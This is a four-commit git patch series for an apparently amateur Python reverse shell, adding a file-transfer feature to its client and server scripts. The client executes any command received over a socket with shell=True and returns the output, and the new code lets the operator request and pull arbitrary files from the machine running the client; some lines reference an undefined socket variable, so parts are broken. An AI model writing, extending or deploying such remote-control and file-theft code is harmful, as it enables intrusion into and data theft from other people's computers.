From 9f7ebe530e8b7eef0be5d085864a4f2ca825c5f6 Mon Sep 17 00:00:00 2001 From: wi6n3l <35975131+wi6n3l@users.noreply.github.com> Date: Tue, 15 Oct 2019 23:07:51 +0100 Subject: [PATCH 1/4] Added reverse shell file transfer protocol Added reverse shell file transfer protocol --- Single_Client/client.py | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) diff --git a/Single_Client/client.py b/Single_Client/client.py index a1c8924..fa66b6c 100644 --- a/Single_Client/client.py +++ b/Single_Client/client.py @@ -1,6 +1,6 @@ import os import socket -import subprocess +import subprocess, time # Create a socket @@ -32,6 +32,22 @@ def receive_commands(): global s while True: data = s.recv(1024) + if data[:2].decode("utf-8") == "ft": + def send_file(file): + print(file) + name = file.split("/")[-1] + with open(file, "r") as f: + file = f.read() + buffer = str(len(file)) + server.send("#{0}#{1}".format(buffer, name).encode("utf-8")) + time.sleep(0.1) + server.send(file.encode("utf-8")) + while True: + file_name = server.recv(1024).decode("utf-8") + if file_name.split("#", 1)[0] == "(FT)": + file_name = file_name.split("#", 1)[1] + send_file(file_name) + break if data[:2].decode("utf-8") == 'cd': os.chdir(data[3:].decode("utf-8")) if len(data) > 0: From e68bca9f869408729aaba34b39858260c00f1d38 Mon Sep 17 00:00:00 2001 From: wi6n3l <35975131+wi6n3l@users.noreply.github.com> Date: Tue, 15 Oct 2019 23:09:30 +0100 Subject: [PATCH 2/4] Corrected some bad errors Corrected some bad errors --- Single_Client/client.py | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/Single_Client/client.py b/Single_Client/client.py index fa66b6c..4da8f47 100644 --- a/Single_Client/client.py +++ b/Single_Client/client.py @@ -48,14 +48,15 @@ def send_file(file): file_name = file_name.split("#", 1)[1] send_file(file_name) break - if data[:2].decode("utf-8") == 'cd': - os.chdir(data[3:].decode("utf-8")) - if len(data) > 0: - cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) - output_bytes = cmd.stdout.read() + cmd.stderr.read() - output_str = str(output_bytes, "utf-8") - s.send(str.encode(output_str + str(os.getcwd()) + '> ')) - print(output_str) + else: + if data[:2].decode("utf-8") == 'cd': + os.chdir(data[3:].decode("utf-8")) + if len(data) > 0: + cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) + output_bytes = cmd.stdout.read() + cmd.stderr.read() + output_str = str(output_bytes, "utf-8") + s.send(str.encode(output_str + str(os.getcwd()) + '> ')) + print(output_str) s.close() From cd7c8e0f623c28301c2a58efb105a8bd3b29fd4a Mon Sep 17 00:00:00 2001 From: wi6n3l <35975131+wi6n3l@users.noreply.github.com> Date: Tue, 15 Oct 2019 23:11:21 +0100 Subject: [PATCH 3/4] Corrected socket variable name Corrected socket variable name --- Single_Client/client.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Single_Client/client.py b/Single_Client/client.py index 4da8f47..2f26590 100644 --- a/Single_Client/client.py +++ b/Single_Client/client.py @@ -39,9 +39,9 @@ def send_file(file): with open(file, "r") as f: file = f.read() buffer = str(len(file)) - server.send("#{0}#{1}".format(buffer, name).encode("utf-8")) + s.send("#{0}#{1}".format(buffer, name).encode("utf-8")) time.sleep(0.1) - server.send(file.encode("utf-8")) + s.send(file.encode("utf-8")) while True: file_name = server.recv(1024).decode("utf-8") if file_name.split("#", 1)[0] == "(FT)": From 68fa925d30c4bf9a12e490f31c18a341bd641abf Mon Sep 17 00:00:00 2001 From: wi6n3l <35975131+wi6n3l@users.noreply.github.com> Date: Tue, 15 Oct 2019 23:16:50 +0100 Subject: [PATCH 4/4] Addded reverse shell file transfer protocol Addded reverse shell file transfer protocol --- Single_Client/server.py | 40 ++++++++++++++++++++++++++++++++-------- 1 file changed, 32 insertions(+), 8 deletions(-) diff --git a/Single_Client/server.py b/Single_Client/server.py index 1acdd89..24440d2 100644 --- a/Single_Client/server.py +++ b/Single_Client/server.py @@ -41,14 +41,38 @@ def socket_accept(): def send_commands(conn): while True: cmd = input() - if cmd == 'quit': - conn.close() - s.close() - sys.exit() - if len(str.encode(cmd)) > 0: - conn.send(str.encode(cmd)) - client_response = str(conn.recv(1024), "utf-8") - print(client_response, end="") + if cmd == "download": + conn.send("ft".encode("utf-8")) + def recive_file(buffer): + while True: + bff = conn.recv(buffer).decode("utf-8") + break + if bff.startswith("#"): + buff = int(bff.split("#", 2)[1]) + name = bff.split("#", 2)[2] + while True: + file = conn.recv(buff).decode("utf-8") + break + with open(name, "w") as f: + f.write(file) + print(file) + return name + while True: + conn, addr = server.accept() + while True: + file_to_transfer = str(input("[!] File to transfer: ")) + file_to_transfer = "(FT)#" + file_to_transfer + conn.send(file_to_transfer.encode("utf-8")) + recive_file(1024) + else: + if cmd == 'quit': + conn.close() + s.close() + sys.exit() + if len(str.encode(cmd)) > 0: + conn.send(str.encode(cmd)) + client_response = str(conn.recv(1024), "utf-8") + print(client_response, end="") def main():